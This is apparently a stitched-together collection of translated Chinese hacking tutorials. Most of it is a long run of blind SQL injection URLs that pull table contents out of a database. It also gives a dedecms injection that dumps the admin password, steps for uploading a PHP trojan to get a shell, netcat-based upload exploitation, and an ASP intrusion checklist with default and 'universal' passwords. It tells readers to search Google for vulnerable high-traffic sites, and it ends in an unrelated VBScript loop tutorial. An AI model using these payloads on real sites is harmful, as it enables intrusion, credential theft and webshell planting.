www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 86>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 87>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 87>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 86>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 88=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 88>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 89=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

The first character of the first record is:

4. Guessing data values:

The data value is one character long: 1

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM AD)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM AD)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT COUNT(*)FROM AD)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT COUNT(*)FROM AD)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT COUNT(*)FROM AD)),0)

Data length: 9 records

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 55=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 55>ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 56=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 56>ascii(substr((SELECT COUNT(*)FROM AD),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 57=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

The following guesses the record values

The record at row 1, column 1 has length 1 and value 1

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

The record at row 1, column 1 has length 1 and value 2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

The record at row 2, column 1 has length 1 and value 2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

The record at row 2, column 2 has length 1 and value 2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

Part 3: dedecms injection vulnerability (script security)

Note: register first. After entering the address, wait a moment and refresh, and the password can be seen.

Author unknown

The problem is in buy_action.php

The pid parameter passed in is not checked carefully enough,

which leads to an SQL injection problem!

Registration address

/member/index_do.php?fmdo=user&dopost=regnew

Dump the administrator password

/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

Very useful. If you can't find one you can exploit, that's your own RP (luck) problem.

Anyway, we found a lot, and they are sites with fairly large traffic, quite good sites.

A correction:

The code the OP posted was not shown in full because this .NET version of the forum has a problem; the full code is:

Dump the administrator password:

CODE:

/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

First,

search Google for Power by DedeCms.

Register an account first; after registering successfully,

directly enter the following:

include/dialoguser/select_soft.php or

include/dialoguser/select_media.php

Then upload a PHP trojan:

first change the extension to one that is allowed for upload, then in the rename field enter trojanname.PHP.

Once the upload succeeds,

access directly

path of the directory/trojanname.php

and a shell is obtained.

Part 4: Exploring upload vulnerabilities in PHP and ASP scripts

1. The principle of upload vulnerability exploitation here applies only to asp and php scripts that upload via a form ***

nc(netcat)

Used to submit packets.

Run from the DOS prompt:

nc -vv www.***.com 80<1.txt

-vv: verbose echo

80: the web port

1.txt: the packet you want to send (see the posts in this forum section for more usage)

wse (wsockexpert): monitors local ports and captures the packets IE submits.

2. Vulnerability principle

Assumptions for the example below:

web host: www.***.com;

bbs path: /bbs/

The vulnerability comes from research on Dvbbs file uploads; readers with some programming experience are advised to look at dvbbs's upfile.asp file, though there is no need to understand all of it.

upfile uploads by generating a form, as follows:

Part 5: Script intrusion: some common techniques for ASP website intrusion

Script intrusion, ASP website intrusion techniques. A note first: check whether the site is static html generated from asp.

If the site is in html format,

we first open the website,

then right-click, choose View Source, then Edit, then Find,

enter asp and see whether the site has ASP files or ASP pages with parameters.

1: Injection points

First, in IE, go to Tools => Internet Options => Advanced and uncheck "Show friendly HTTP error messages"; otherwise, whatever error the server returns, IE only shows an HTTP 500 server error and no further information can be obtained.

site/web0day.asp?id=1

Append a single quote ' to this address; if and 1=1 then returns the normal page while and 1=2 returns an error, an injection vulnerability exists!

Exposing the database path from an injection point

For example, take the injection point site/asp/web0day.asp?id=1

and change it to site/asp%5cweb0day.asp?id=1,

using %5c to make the server expose the database path in its error message.

If there is no injection point, use a batch injection-point scanning tool; if anti-injection filtering is present, use relay injection.

2: Upload vulnerabilities

Scan with an upload-vulnerability dictionary or tool; a Baidu search turns up plenty.

3: Admin backend

1:

Most sites use an admin or manage directory; if the directory exists but the backend page cannot be seen,

scan with a backend dictionary or tool.

If injection leads nowhere, we scan the site directories,

for example: www.xxx.com/manage/

2: Or right-click an image on the site, choose Properties and look at the address,

for example

www.xxx.com/images/123.jpg

then check whether directory listing is possible at

www.xxx.com/images/

If it is www.xxx.com/admin/images/123.jpg,

the backend is usually www.xxx.com/admin/, and sometimes that goes straight to the backend.

If not, scan that directory directly with a dictionary or tool.

3: Look at the copyright and ICP record area at the bottom of the site,

for example Powered by xxx, or the site links.

4: Backend intrusion

Passwords commonly tried against backends: admin admin admin admin888, and so on.

Universal passwords: 'or'='or'  'xor 'xor

5: Editor vulnerabilities; if you don't know them, a Baidu search turns up plenty.

6: Some issues with injection-point intrusion

1: Sometimes the table name cannot be found from the injection point; first check whether the backend has any related resources.

Look at the copyright and ICP record area at the bottom of the site, for example Powered by xxx, or the site links, then download the source from Baidu and analyse it.

2: Sometimes the column names cannot be found from the injection point; go to the backend, view the source, and look at the user fields.

Part 6: Detailed tutorial on ASP script loop statements

A defining feature of the ASP (Active Server Pages) environment is that pages are written in one or more scripting languages. A scripting language can be seen as a simplified version of a programming language; it is easy to learn and master, which is a great convenience for designers of dynamic websites. One could say that how well the scripting language is used directly determines whether an ASP application is good or bad. Having covered VBScript functions and conditional statements in the previous article, today we continue with loop statements in VBScript.

Loop statements repeatedly execute program code. Loops fall into three kinds: one repeats statements until the condition becomes False, one repeats statements until the condition becomes True, and the third repeats statements a specified number of times. The following loop statements are available in VBScript:

Do...Loop: loops while (or until) the condition is True.

While...Wend: loops while the condition is True.

For...Next: runs statements a specified number of times, using a counter.

For Each...Next: repeats a group of statements for each item in a collection or each element in an array.

Let us first look at Do...Loop, which runs a block of statements an indefinite number of times: the block is repeated while the condition is True, or until it becomes True. See the following example:

<html><head>
<title>DoLoop.asp</title></head><body bgcolor="#FFFFFF"><p></p>
<p>请将今年到本月为止的每个月份的销售结算记录填写在本页之上。<P>
<%
counter = 1
thismonth = month(now)
Do while counter < thismonth + 1
response.write " " & counter & " 月份 : "
response.write "______________________________" & "<BR><br>"
If counter > 13 then
exit do
end if
counter = counter+1
Loop
%>
<hr></body></html>

This ASP program uses a loop to produce a sales settlement record table. Paste the code above into Notepad, save it as DoLoop.asp and open it in a browser over HTTP; depending on the current month, you will see a result like the figure below.

Let us analyse this program. The goal is to print a table according to the current month. First we create a counter, counter, and set it to 1; then we use the functions month() and now() to obtain the current month; finally we build the loop: while counter is less than the current month plus 1, the month number and a horizontal line are displayed and counter is incremented by 1. The loop repeats until that condition becomes False. If counter exceeds 13, exit do leaves the loop immediately.

The Do...Loop statement can also use the following syntax:

Do
[statements]
[Exit Do]
[statements]
Loop [{While | Until} condition]

The While...Wend statement is provided for users who are familiar with it, but because While...Wend lacks flexibility, Do...Loop is recommended instead. Next we look at For...Next. The For...Next statement runs a block of statements a specified number of times, using a counter variable whose value increases or decreases on each pass.

The following example runs the procedure MyProc 50 times. The For statement specifies the counter variable x and its start and end values; the Next statement increments the counter by 1 on each pass.

Sub DoMyProc50Times()
Dim x
For x = 1 To 50
MyProc
Next
End Sub

The Step keyword specifies the amount by which the counter variable increases or decreases each time. In the example below, the counter j increases by 2 on each pass; when the loop ends, total is the sum of 2, 4, 6, 8 and 10.

Sub TwosTotal()
Dim j, total
For j = 2 To 10 Step 2
total = total + j
Next
MsgBox "总和为 " & total & "。"
End Sub

To make the counter decrease, set Step to a negative value; the counter's end value must then be smaller than its start value. In the example below, the counter myNum decreases by 2 on each pass; when the loop ends, total is the sum of 16, 14, 12, 10, 8, 6, 4 and 2.

Sub NewTotal()
Dim myNum, total
For myNum = 16 To 2 Step -2
total = total + myNum
Next
MsgBox "总和为 " & total & "。"
End Sub

Exit For leaves a For...Next statement before the counter reaches its end value. Since the loop usually only needs to be left in special situations (for example when an error occurs), Exit For can be placed in the True block of an If...Then...Else statement; if the condition is False, the loop runs as normal.

